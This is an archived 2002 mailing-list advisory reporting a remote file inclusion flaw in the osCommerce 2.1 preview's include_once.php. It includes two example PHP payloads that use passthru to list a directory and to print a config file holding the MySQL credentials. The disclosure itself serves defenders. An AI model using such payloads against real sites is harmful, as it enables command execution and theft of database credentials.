PHP source injection in osCommerce

From: Tim Vandermeerch (Tim.Vandermeerschat_private)
Date: Sun Jun 16 2002 - 08:36:03 PDT

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    PHP source injection in osCommerce
    Product Description
    osCommerce is an open source e-commerce solution under on going 
    development by the open source community. Its feature packed out-of-the-
    box installation allows store owners to setup, run, and maintain their 
    online stores with minimum effort and with no costs involved. It can be 
    found at
    Tested version
    Preview Release 2.1 (06/03/2001)
    (this is a preview version, but there are alot of online shops who use 
    The Problem
    osCommerce commes with a file called /catalog/includes/include_once.php, 
    and looks like this:
    -------- include_once.php --------
      if (!defined($include_file . '__')) {
        define($include_file . '__', 1);
    If someone request a URL like 
    include_file=FILE_WE_WANT_TO_INCLUDE, he would be able to include any code 
    he wants
    This could be a serious problem because this user could query the SQL 
    server and get acccess to other important files...
    -------- Example 1 --------
    --- a.php ---
    <? passthru("/bin/ls")?>
    Output: dir listing of the current dierctory
    -------- Example 2 --------
    --- b.php ---
    <? passthru("/bin/cat application_top.php")?>
    Output: outputs the application_top.php file wich includes MySQL username, 
    password, ...
    I informed the vendor and hope that they will release a patch soon
    Tim Vandermeersch

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